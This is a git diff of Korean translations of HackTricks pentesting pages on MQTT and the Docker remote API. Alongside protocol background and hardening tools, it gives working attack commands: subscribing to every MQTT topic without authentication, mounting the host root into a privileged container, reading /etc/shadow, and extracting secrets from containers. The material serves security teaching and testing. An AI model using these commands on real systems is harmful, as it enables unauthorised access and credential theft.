- **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) **팔로우**하세요.
- **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, **스틸러 악성 소프트웨어**에 의해 회사나 고객이 **침해당했는지** 확인하는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, **스틸러 악성 소프트웨어**에 의해 **침해**되었는지 회사 또는 고객을 확인하는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료**로 시험해 볼 수 있습니다:
그들의 웹사이트를 확인하고 **무료**로 엔진을 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -30,7 +30,7 @@ WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로
## 기본 정보
**MQ Telemetry Transport (MQTT)**는 **발행/구독 메시징 프로토콜**로, 극도로 간단하고 가벼운 것으로 알려져 있습니다. 이 프로토콜은 기기가 제한된 기능을 가지고 있고 대역폭이 낮거나 지연이 크거나 신뢰할 수 없는 연결로 특징 지어지는 환경에 특별히 맞춰져 있습니다. MQTT의 핵심 목표는 네트워크 대역폭 사용을 최소화하고 기기 자원에 대한 수요를 줄이는 것입니다. 또한 신뢰할 수 있는 통신을 유지하고 일정 수준의 전달 보증을 제공하는 것을 목표로 합니다. 이러한 목표로 MQTT는 **기기 간 통신(M2M)** 및 **사물 인터넷(IoT)** 분야에 매우 적합하며, 효율적으로 다양한 기기를 연결하는 것이 필수적인 경우에 사용됩니다. 또한 대역폭과 배터리 수명을 보존해야 하는 모바일 애플리케이션에 매우 유용합니다.
**MQ Telemetry Transport (MQTT)**는 **발행/구독 메시징 프로토콜**로, 극도로 간단하고 가벼운 것으로 알려져 있습니다. 이 프로토콜은 기기가 제한된 기능을 가지고 있고 대역폭이 낮거나 지연이 크거나 신뢰할 수 없는 연결로 특징 지어지는 네트워크에서 작동하는 환경에 특별히 맞춰져 있습니다. MQTT의 핵심 목표는 네트워크 대역폭 사용을 최소화하고 기기 자원에 대한 수요를 줄이는 것입니다. 또한 신뢰할 수 있는 통신을 유지하고 일정 수준의 전달 보증을 제공하는 것을 목표로 합니다. 이러한 목표로 MQTT는 **기기 간 통신(M2M)** 및 **사물 인터넷(IoT)** 분야에 매우 적합하며, 효율적으로 다양한 기기를 연결하는 것이 필수적인 곳에서 특히 유용합니다. 또한 대역폭과 배터리 수명을 보존하는 것이 중요한 모바일 애플리케이션에 매우 유용합니다.
**기본 포트:** 1883
```
@ -54,21 +54,23 @@ MQTT 브로커가 **CONNECT** 패킷을 수신하면 **CONNACK** 패킷이 반
## MQTT Pentesting
**인증은 완전히 선택 사항**이며 심지어 인증이 수행 중이더라도 **기본적으로 암호화가 사용되지 않습니다**(자격 증명은 평문으로 전송됨). MITM 공격을 통해 비밀번호를 도난당할 수 있습니다.
**인증은 완전히 선택 사항**이며 심지어 인증이 수행 중이더라도 **기본적으로 암호화가 사용되지 않습니다**(자격 증명은 평문으로 전송됨). 중간자 공격을 통해 비밀번호를 도용할 수 있습니다.
MQTT 서비스에 연결하려면 다음을 사용할 수 있습니다: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) 및 다음을 수행하여 모든 주제에 대해 스스로를 구독합니다:
MQTT 서비스에 연결하려면 다음을 수행할 수 있습니다: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) 및 다음을 수행하여 모든 주제에 대해 스스로를 구독합니다:
```
> connect (NOTICE that you need to indicate before this the params of the connection, by default 127.0.0.1:1883)
> subscribe "#" 1
> subscribe "$SYS/#"
```
당신은 [**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn)을 사용할 수도 있습니다.
You can also use:
```bash
apt-get install mosquitto mosquitto-clients
mosquitto_sub -t 'test/topic' -v #Subscribe to 'test/topic'
mosquitto_sub -h <host-ip> -t "#" -v #Subscribe to ALL topics.
```
또는 이 코드를 실행하여 인증 없이 MQTT 서비스에 연결을 시도하고 모든 주제를 구독하고 듣습니다:
또는 이 코드를 실행하여 인증 없이 MQTT 서비스에 연결을 시도하고 모든 주제를 구독하고 듣을 수 있습니다:
```python
#This is a modified version of https://github.com/Warflop/IOT-MQTT-Exploit/blob/master/mqtt.py
import paho.mqtt.client as mqtt
@ -107,7 +109,7 @@ main()
- **발행자(Publisher)**: 브로커의 하나(또는 여러 개)의 주제에 메시지를 발행합니다.
- **구독자(Subscriber)**: 브로커의 하나(또는 여러 개)의 주제를 구독하고 발행자로부터 보낸 모든 메시지를 수신합니다.
- **브로커(Broker)**: 발행자로부터 모든 메시지를 구독자에게 라우팅합니다.
- **브로커(Broker)**: 발행자로부터 수신한 모든 메시지를 구독자에게 라우팅합니다.
- **주제(Topic)**: 슬래시(/)로 구분된 하나 이상의 수준으로 구성됩니다(예: /smartshouse/livingroom/temperature).
### 패킷 형식 <a href="#f15a" id="f15a"></a>
@ -118,12 +120,12 @@ main()
### 패킷 유형
- CONNECT (1): 클라이언트가 서버에 연결을 요청하기 위해 시작됩니다.
- CONNECT (1): 서버에 연결을 요청하기 위해 클라이언트에 의해 시작됩니다.
- CONNACK (2): 성공적인 연결에 대한 서버의 확인.
- PUBLISH (3): 클라이언트에서 서버 또는 그 반대로 메시지를 보내는 데 사용됩니다.
- PUBACK (4): PUBLISH 패킷의 확인.
- PUBREC (5): 메시지 수신되었음을 보장하는 메시지 전달 프로토콜의 일부입니다.
- PUBREL (6): 메시지 전달의 추가 보증으로 메시지 릴리스를 나타냅니다.
- PUBREC (5): 메시지 수신을 보장하는 메시지 전달 프로토콜의 일부입니다.
- PUBREL (6): 메시지 전달의 추가적인 보증으로 메시지 릴리스를 나타냅니다.
- PUBCOMP (7): 메시지 전달 프로토콜의 최종 부분으로 완료를 나타냅니다.
- SUBSCRIBE (8): 클라이언트가 주제에서 메시지를 수신하기 위해 요청합니다.
- SUBACK (9): SUBSCRIBE 요청에 대한 서버의 확인.
@ -131,35 +133,35 @@ main()
- UNSUBACK (11): UNSUBSCRIBE 요청에 대한 서버의 응답.
- PINGREQ (12): 클라이언트가 보내는 하트비트 메시지.
- PINGRESP (13): 하트비트 메시지에 대한 서버의 응답.
- DISCONNECT (14): 클라이언트가 연결을 종료하기 위해 시작합니다.
- DISCONNECT (14): 연결을 종료하기 위해 클라이언트에 의해 시작됩니다.
- 0과 15라는 두 값은 예약되어 있으며 사용이 금지되어 있습니다.
## Shodan
- `port:1883 MQTT`
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 하는 검색 엔진으로, 회사 또는 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격에 대항하는 것입니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 **무료**로 엔진을 시도해 볼 수 있습니다:
그들의 웹사이트를 확인하고 **무료**로 엔진을 시도해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)로부터 제로부터 영웅이 되기까지 AWS 해킹을 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>와 함께 **제로**부터 **히어로**까지 AWS 해킹을 배우세요!</summary>
HackTricks를 지원하는 다른 방법:
- **회사를 HackTricks에 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
- **회사를 HackTricks에 광고**하거나 **PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
- [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구입하세요
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
- 💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우**하세요.
- **HackTricks 및 HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
- **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>

View file

@ -2,27 +2,27 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 **제로**부터 **히어로**까지 AWS 해킹을 배우세요!</summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 제로부터 전문가까지 배우세요</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고하거나 PDF로 다운로드**하고 싶다면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하고 싶다면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* 💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f)에 가입하거나 [**텔레그램 그룹**](https://t.me/peass)에 참여하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)를 **팔로우**하세요.
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, **스틸러 악성 소프트웨어**에 의해 회사나 고객이 **침해당했는지** 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 훔치는 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보를 훔치는 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료로**해 볼 수 있습니다:
그들의 웹사이트를 방문하여 엔진을 **무료로**해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -32,13 +32,13 @@ WhiteIntel의 주요 목표는 정보를 훔치는 악성 코드로 인한 계
#### 도커란
도커는 **컨테이너화 산업**에서 **선두 플랫폼**으로, **지속적인 혁신**을 주도합니다. 이는 **전통적인 것부터 미래 지향적인** 애플리케이션의 **쉬운 생성 및 배포**를 용이하게 하고, 다양한 환경에서의 **안전한 배포**를 보장합니다.
도커는 **컨테이너화 산업**에서 **선두 플랫폼**으로, **지속적인 혁신**을 주도합니다. 이는 **전통적인 것부터 미래 지향적인** 애플리케이션의 쉬운 생성 및 배포를 용이하게 하고, 다양한 환경에서의 **안전한 배포**를 보장합니다.
#### 기본 도커 아키텍처
* [**containerd**](http://containerd.io): 이것은 컨테이너의 **라이프사이클을 포괄적으로 관리**하는 **핵심 런타임**으로, **이미지 전송 및 저장**을 처리하며 컨테이너의 **실행, 모니터링 및 네트워킹**을 감독합니다. **containerd에 대한 더 자세한 통찰**이 **더 탐구**됩니다.
* [**containerd**](http://containerd.io): 이것은 컨테이너의 **라이프사이클을 포괄적으로 관리**하는 **핵심 런타임**입니다. 이는 **이미지 전송 및 저장**을 처리하며, 컨테이너의 **실행, 모니터링 및 네트워킹**을 감독합니다. **containerd에 대한 더 자세한 통찰**이 **더 탐구**됩니다.
* **컨테이너 쉼**은 **헤드리스 컨테이너**를 다루는 데 중요한 역할을 하며, 컨테이너가 초기화된 후 **runc**에서 자연스럽게 대체됩니다.
* [**runc**](http://runc.io): 가벼우면서 범용적인 컨테이너 런타임 기능으로 인해 존경받는 runc는 **OCI 표준**과 일치합니다. 이는 컨테이너를 **OCI 지침**에 따라 **시작하고 관리**하기 위해 containerd에 의해 사용되며, 원래 **libcontainer**에서 발전한 것입니다.
* [**runc**](http://runc.io): 가벼우면서 범용적인 컨테이너 런타임 기능으로 인해 존경받는 runc는 **OCI 표준**과 일치합니다. 이는 컨테이너를 **OCI 지침**에 따라 **시작하고 관리**하기 위해 containerd에 의해 사용되며, 원래 **libcontainer**에서 발전했습니다.
* [**grpc**](http://www.grpc.io)는 containerd와 **도커 엔진** 간의 **효율적인 상호 작용**을 보장하기 위해 **통신을 용이하게** 합니다.
* [**OCI**](https://www.opencontainers.org)는 런타임 및 이미지에 대한 **OCI 사양**을 유지하는 데 중요하며, 최신 도커 버전은 **OCI 이미지 및 런타임** 표준 모두와 **일치**합니다.
@ -67,11 +67,11 @@ docker system prune -a
```
#### Containerd
**Containerd**는 특히 **Docker와 Kubernetes**와 같은 컨테이너 플랫폼의 요구를 충족하기 위해 개발되었습니다. 이는 Linux, Windows, Solaris 등 다양한 운영 체제에서 컨테이너의 실행을 **간단하게** 하기 위해 운영 체제별 기능과 시스템 호출을 추상화합니다. Containerd의 목표는 사용자가 필요로 하는 핵심 기능만 포함하고 불필요한 구성 요소를 배제하려는 것이지만, 이 목표를 완전히 달성하는 것은 어렵다고 인정됩니다.
**Containerd**는 특히 **Docker와 Kubernetes**와 같은 컨테이너 플랫폼의 요구를 충족하기 위해 개발되었습니다. 이는 Linux, Windows, Solaris 등 다양한 운영 체제에서 컨테이너의 실행을 **간단하게** 하기 위해 운영 체제별 기능과 시스템 호출을 추상화합니다. Containerd의 목표는 사용자가 필요로 하는 핵심 기능만 포함하고 불필요한 구성 요소를 배제하려는 것입니다. 그러나 이 목표를 완전히 달성하는 것은 어려운 과제로 인정되고 있습니다.
중요한 설계 결정 중 하나는 **Containerd가 네트워킹을 처리하지 않는** 것입니다. 네트워킹은 분산 시스템에서 중요한 요소로 간주되며, 소프트웨어 정의 네트워킹(SDN) 및 서비스 검색과 같은 복잡성은 플랫폼마다 크게 다릅니다. 따라서 Containerd는 네트워킹 측면을 지원하는 플랫폼에게 맡기고 있습니다.
**Docker는 Containerd를 활용**하여 컨테이너를 실행하지만, Containerd는 Docker의 기능 중 일부만 지원한다는 점을 강조해야 합니다. 구체적으로, Containerd는 Docker에 있는 네트워크 관리 기능을 갖추지 않으며 Docker 스웜의 직접적인 생성을 지원하지 않습니다. 이 차이점은 Containerd가 컨테이너 런타임 환경으로서의 역할을 강조하고, 더 특화된 기능을 통합하는 플랫폼에게 위임한다는 것을 보여줍니다.
**Docker는 Containerd를 활용**하여 컨테이너를 실행하지만, Containerd는 Docker의 기능 중 일부만 지원한다는 점을 강조해야 합니다. 구체적으로, Containerd는 Docker에 있는 네트워크 관리 기능을 갖추지 않으며 Docker 스웜을 직접 생성하는 것을 지원하지 않습니다. 이 차이점은 Containerd가 컨테이너 실행 환경으로서의 역할에 중점을 두고 있으며, 더 특화된 기능은 통합되는 플랫폼에 위임하고 있음을 강조합니다.
```bash
#Containerd CLI
ctr images pull --skip-verify --plain-http registry:5000/alpine:latest #Get image
@ -89,20 +89,20 @@ ctr container delete <containerName>
```
#### Podman
**Podman**은 Red Hat에서 개발 및 유지보수되는 [Open Container Initiative (OCI) 표준](https://github.com/opencontainers)을 준수하는 오픈 소스 컨테이너 엔진입니다. Docker와는 다른 특징**데몬 없는 아키텍처****루트리스 컨테이너** 지원으로 사용자가 루트 권한 없이 컨테이너를 실행할 수 있습니다.
**Podman**은 Red Hat에서 개발 및 유지보수되는 [Open Container Initiative (OCI) 표준](https://github.com/opencontainers)을 준수하는 오픈 소스 컨테이너 엔진입니다. Docker와는 다른 특징으로 **데몬 없는 아키텍처**와 **루트리스 컨테이너** 지원이 주목받습니다. 이를 통해 사용자는 루트 권한 없이 컨테이너를 실행할 수 있습니다.
Podman은 Docker의 API와 호환되도록 설계되어 Docker CLI 명령을 사용할 수 있습니다. 이 호환성은 **Buildah**와 같은 컨테이너 이미지 빌드 도구 및 **Skopeo**와 같은 이미지 작업 도구를 포함한 생태계에도 확장됩니다. 이러한 도구에 대한 자세한 내용은 [GitHub 페이지](https://github.com/containers/buildah/tree/master/docs/containertools)에서 확인할 수 있습니다.
Podman은 Docker의 API와 호환되도록 설계되어 Docker CLI 명령을 사용할 수 있습니다. 이 호환성은 **Buildah** (컨테이너 이미지 빌드용) 및 **Skopeo** (푸시, 풀, 검사 등 이미지 작업용)와 같은 도구를 포함한 생태계로 확장됩니다. 이러한 도구에 대한 자세한 내용은 [GitHub 페이지](https://github.com/containers/buildah/tree/master/docs/containertools)에서 확인할 수 있습니다.
**주요 차이점**
* **아키텍처**: 백그라운드 데몬이 없는 Docker의 클라이언트-서버 모델과 달리 Podman은 데몬 없이 작동합니다. 이 설계는 컨테이너가 시작한 사용자의 권한으로 실행되어 루트 액세스가 필요하지 않아 보안을 강화합니다.
* **Systemd 통합**: Podman은 컨테이너 관리를 위해 **systemd**와 통합되어 systemd 단위를 통해 컨테이너를 관리할 수 있습니다. 이는 Docker가 주로 Docker 데몬 프로세스를 관리하는 데 systemd를 사용하는 것과 대조됩니다.
* **아키텍처**: Docker의 클라이언트-서버 모델과 달리 Podman은 데몬 없이 작동합니다. 이 설계는 컨테이너가 시작한 사용자의 권한으로 실행되어 루트 액세스가 필요하지 않아 보안을 강화합니다.
* **Systemd 통합**: Podman은 컨테이너 관리를 위해 **systemd**와 통합되어 있어 systemd 단위를 통해 컨테이너를 관리할 수 있습니다. 이는 Docker가 주로 Docker 데몬 프로세스를 관리하기 위해 systemd를 사용하는 것과 대조됩니다.
* **루트리스 컨테이너**: Podman의 중요한 기능 중 하나는 컨테이너를 시작한 사용자의 권한으로 실행할 수 있는 능력입니다. 이 접근 방식은 공격자가 손상된 사용자의 권한만 획들하고 루트 액세스를 얻지 못하도록 하여 컨테이너 침입과 관련된 위험을 최소화합니다.
Podman의 접근 방식은 사용자 권한 관리와 기존 Docker 워크플로와의 호환성을 강조하여 Docker에 대한 안전하고 유연한 대안을 제공합니다.
Podman은 사용자 권한 관리와 기존 Docker 워크플로와의 호환성을 강조하여 Docker에 대한 안전하고 유연한 대안을 제공합니다.
{% hint style="info" %}
Podman이 동일한 API를 지원하도록 설계되었기 때문에 podman에서도 docker와 같은 명령을 사용할 수 있습니다.
Podman이 도커와 동일한 API를 지원하도록 설계되었기 때문에 도커와 동일한 명령을 Podman에서 사용할 수 있습니다.
```bash
podman --version
podman info
@ -113,7 +113,7 @@ podman ls
### 기본 정보
원격 API는 기본적으로 2375 포트에서 실행됩니다. 활성화된 경우 인증이 필요하지 않으며, 공격자가 특권이 있는 도커 컨테이너를 시작할 수 있습니다. 원격 API를 사용하면 호스트/ (루트 디렉토리)를 컨테이너에 연결하고 호스트 환경의 파일을 읽거나 쓸 수 있습니다.
원격 API는 기본적으로 2375 포트에서 실행됩니다. 활성화되면 인증이 필요하지 않으며, 공격자가 특권이 있는 도커 컨테이너를 시작할 수 있습니다. 원격 API를 사용하면 호스트/ (루트 디렉토리)를 컨테이너에 연결하고 호스트 환경의 파일을 읽거나 쓸 수 있습니다.
**기본 포트:** 2375
```
@ -124,7 +124,7 @@ PORT STATE SERVICE
#### 수동
도커 API를 열거하려면 다음 예와 같이 `docker` 명령 또는 `curl`을 사용할 수 있습니다:
도커 API를 열거하려면 다음 예와 같이 `docker` 명령 또는 `curl`을 사용할 수 있습니다:
```bash
#Using curl
curl -s http://open.docker.socket:2375/version | jq #Get version
@ -160,19 +160,19 @@ docker-init:
Version: 0.18.0
GitCommit: fec3683
```
만약 **`docker` 명령어로 원격 docker API에 연락**할 수 있다면, 서비스와 상호작용하기 위해 이전에 주석 처리된 **docker** [**명령어 중**](2375-pentesting-docker.md#basic-commands) 아무 것이나 **실행**할 수 있습니다.
만약 `docker` 명령어로 원격 docker API에 연락할 수 있다면, 서비스와 상호작용하기 위해 이전에 언급된 **docker** [**명령어**](2375-pentesting-docker.md#basic-commands)를 **실행**할 수 있습니다.
{% hint style="info" %}
`export DOCKER_HOST="tcp://localhost:2375"`를 사용하여 **빠르게** 권한 상승을 할 수 있습니다. docker 명령어에 `-H` 매개변수를 사용하지 않도록 **주의**하세요.
`export DOCKER_HOST="tcp://localhost:2375"`를 사용하여 docker 명령어에 `-H` 매개변수를 **사용하지 않고** 연결할 수 있습니다.
{% endhint %}
**빠른 권한 상**
**빠른 권한 상**
```bash
docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash
```
**Curl**
가끔 **2376**이 **TLS** 엔드포인트로 표시됩니다. 도커 클라이언트로 연결할 수 없었지만 curl을 사용하여 연결할 수 있습니다.
가끔 **2376**이 **TLS** 엔드포인트로 올라와 있는 것을 볼 수 있습니다. 도커 클라이언트로 연결할 수 없었지만 curl을 사용하여 연결할 수 있습니다.
```bash
#List containers
curl insecure https://tlsopen.docker.socket:2376/containers/json | jq
@ -202,6 +202,8 @@ curl insecure -vv -X POST -H "Content-Type: application/json" https://tls-ope
#Delete stopped containers
curl insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune
```
만약 이에 대해 더 많은 정보를 원한다면, 명령어를 복사한 곳에서 더 많은 정보를 확인할 수 있습니다: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
#### 자동
```bash
msf> use exploit/linux/http/docker_daemon_tcp
@ -209,13 +211,13 @@ nmap -sV --script "docker-*" -p <PORT> <IP>
```
### Compromising
다음 페이지에서 **도커 컨테이너에서 탈출하는 방법**을 찾을 수 있습니다:
다음 페이지에서 **도커 컨테이너에서 탈출하는 방법**을 찾을 수 있습니다:
{% content-ref url="../linux-hardening/privilege-escalation/docker-security/" %}
[docker-security](../linux-hardening/privilege-escalation/docker-security/)
{% endcontent-ref %}
이를 악용하면 컨테이너를 탈출할 수 있으며, 원격 머신에서 취약한 컨테이너를 실행하고 해당 컨테이너에서 탈출하여 머신을 침해할 수 있습니다:
이를 악용하면 컨테이너를 탈출하여 원격 머신에서 취약한 컨테이너를 실행하고 해당 컨테이너에서 탈출하여 머신을 침해할 수 있습니다:
```bash
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/etc/shadow
@ -224,14 +226,14 @@ cat /mnt/etc/shadow
### 권한 상슨
만약 도커를 사용하는 호스트 내부에 있다면 [**권한 상슨을 시도해보기 위해 이 정보를 읽어보세요**](../linux-hardening/privilege-escalation/#writable-docker-socket).
만약 도커를 사용하는 호스트 내부에 있다면 [**권한 상슨을 시도기 위해 이 정보를 읽어보세요**](../linux-hardening/privilege-escalation/#writable-docker-socket).
### 실행 중인 도커 컨테이너에서 비밀 정보 발견
```bash
docker ps [| grep <kubernetes_service_name>]
docker inspect <docker_id>
```
**환경 변수** (환경 변수 섹션)에서 비밀을 찾을 수 있습니다:
**env** (환경 변수 섹션)에서 비밀을 찾을 수 있습니다:
* 비밀번호.
* IP 주소.
@ -251,43 +253,43 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
* `./docker-bench-security.sh`
* 현재 도커 설치를 검사하려면 [https://github.com/kost/dockscan](https://github.com/kost/dockscan) 도구를 사용할 수 있습니다.
* `dockscan -v unix:///var/run/docker.sock`
* 다양한 보안 옵션으로 실행될 때 컨테이너가 갖게 될 권한을 확인하려면 [https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained) 도구를 사용할 수 있습니다. 일부 보안 옵션을 사용하여 컨테이너를 실행하는 결과를 알 수 있어 유용합니다:
* 다양한 보안 옵션으로 실행될 때 컨테이너가 갖게 될 권한을 확인하려면 [https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained) 도구를 사용할 수 있습니다. 이는 컨테이너를 실행하는 데 일부 보안 옵션을 사용하는 결과를 알 수 있어 유용합니다:
* `docker run --rm -it r.j3ss.co/amicontained`
* `docker run --rm -it --pid host r.j3ss.co/amicontained`
* `docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained`
#### 도커 이미지 보안
* 다른 도커 이미지를 스캔하고 취약점을 찾기 위해 [https://github.com/quay/clair](https://github.com/quay/clair) 도커 이미지를 사용할 수 있습니다.
* 다른 도커 이미지를 스캔하고 취약점을 찾기 위해 [https://github.com/quay/clair](https://github.com/quay/clair) 도커 이미지를 사용할 수 있습니다.
* `docker run --rm -v /root/clair_config/:/config -p 6060-6061:6060-6061 -d clair -config="/config/config.yaml"`
* `clair-scanner -c http://172.17.0.3:6060 --ip 172.17.0.1 ubuntu-image`
#### 도커 파일 보안
* **Dockerfile을 검사**하고 모든 종류의 잘못된 구성을 찾기 위해 [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) 도구를 사용할 수 있습니다. 각 잘못된 구성에는 ID가 할당되며, 각각을 수정하는 방법은 [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md)에서 찾을 수 있습니다.
* **도커 파일을 검사**하고 모든 종류의 잘못된 구성을 찾기 위해 [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) 도구를 사용할 수 있습니다. 각 잘못된 구성에는 ID가 부여되며, 각각을 수정하는 방법은 [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md)에서 찾을 수 있습니다.
* `dockerfilelinter -f Dockerfile`
![](<../.gitbook/assets/image (173).png>)
* **Dockerfile을 검사**하고 모든 종류의 잘못된 구성을 찾기 위해 [https://github.com/replicatedhq/dockerfilelint](https://github.com/replicatedhq/dockerfilelint) 도구를 사용할 수 있습니다.
* **도커 파일을 검사**하고 모든 종류의 잘못된 구성을 찾기 위해 [https://github.com/replicatedhq/dockerfilelint](https://github.com/replicatedhq/dockerfilelint) 도구를 사용할 수 있습니다.
* `dockerfilelint Dockerfile`
![](<../.gitbook/assets/image (209).png>)
* **Dockerfile을 검사**하고 모든 종류의 잘못된 구성을 찾기 위해 [https://github.com/RedCoolBeans/dockerlint](https://github.com/RedCoolBeans/dockerlint) 도구를 사용할 수 있습니다.
* **도커 파일을 검사**하고 모든 종류의 잘못된 구성을 찾기 위해 [https://github.com/RedCoolBeans/dockerlint](https://github.com/RedCoolBeans/dockerlint) 도구를 사용할 수 있습니다.
* `dockerlint Dockerfile`
![](<../.gitbook/assets/image (68).png>)
* **Dockerfile을 검사**하고 모든 종류의 잘못된 구성을 찾기 위해 [https://github.com/hadolint/hadolint](https://github.com/hadolint/hadolint) 도구를 사용할 수 있습니다.
* **도커 파일을 검사**하고 모든 종류의 잘못된 구성을 찾기 위해 [https://github.com/hadolint/hadolint](https://github.com/hadolint/hadolint) 도구를 사용할 수 있습니다.
* `hadolint Dockerfile`
![](<../.gitbook/assets/image (498).png>)
#### 수상한 활동 로깅
* **실행 중인 컨테이너에서 수상한 동작을 감지**하기 위해 [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) 도구를 사용할 수 있습니다.
* 다음 청크에서 **Falco가 커널 모듈을 컴파일하고 삽입**하는 방법을 확인할 수 있습니다. 그 후 규칙을 로드하고 **수상한 활동을 로깅**을 시작합니다. 이 경우 2개의 특권 컨테이너가 시작되었고, 그 중 하나는 민감한 마운트를 가지고 있으며, 몇 초 후에 컨테이너 중 하나에서 셸이 열렸음을 감지했습니다.
* **실행 중인 컨테이너에서 수상한 동작을 감지**하려면 [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) 도구를 사용할 수 있습니다.
* 다음 청크에서 **Falco가 커널 모듈을 컴파일하고 삽입**하는 방법을 확인하세요. 그 후 규칙을 로드하고 **수상한 활동을 로깅**을 시작합니다. 이 경우 2개의 특권 컨테이너가 시작되었고, 그 중 하나는 민감한 마운트를 가지고 있으며, 몇 초 후에 컨테이너 중 하나에서 셸이 열렸음을 감지했습니다.
```bash
